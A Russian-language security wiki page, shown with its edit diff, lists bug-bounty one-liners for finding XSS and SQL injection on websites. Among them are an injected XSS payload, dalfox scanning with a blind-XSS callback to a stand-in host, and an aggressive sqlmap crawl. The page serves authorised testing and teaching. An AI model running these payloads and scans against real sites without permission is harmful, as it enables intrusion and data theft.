Bugbounty — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) м |
Drakylar (обсуждение | вклад) м |
||
| (не показана 1 промежуточная версия этого же участника) | |||
| Строка 1: | Строка 1: | ||
На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости | На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости | ||
| + | = Уязвимости = | ||
| + | == XSS == | ||
| + | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq | ||
| + | |||
| + | gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt | ||
| − | + | waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt | |
| + | |||
| + | cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")" | ||
| + | |||
| + | </syntaxhighlight> | ||
| + | |||
| + | == SQL injection == | ||
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
| − | + | python sqlmap.py -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3 | |
</syntaxhighlight> | </syntaxhighlight> | ||
| + | |||
| + | == Backups == | ||
| + | |||
| + | |||
| + | = Ссылки = | ||
| + | |||
| + | https://github.com/dwisiswant0/awesome-oneliner-bugbounty | ||
Текущая версия на 12:13, 20 марта 2022
На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости
Содержание
Уязвимости
XSS
echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"SQL injection
python sqlmap.py -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3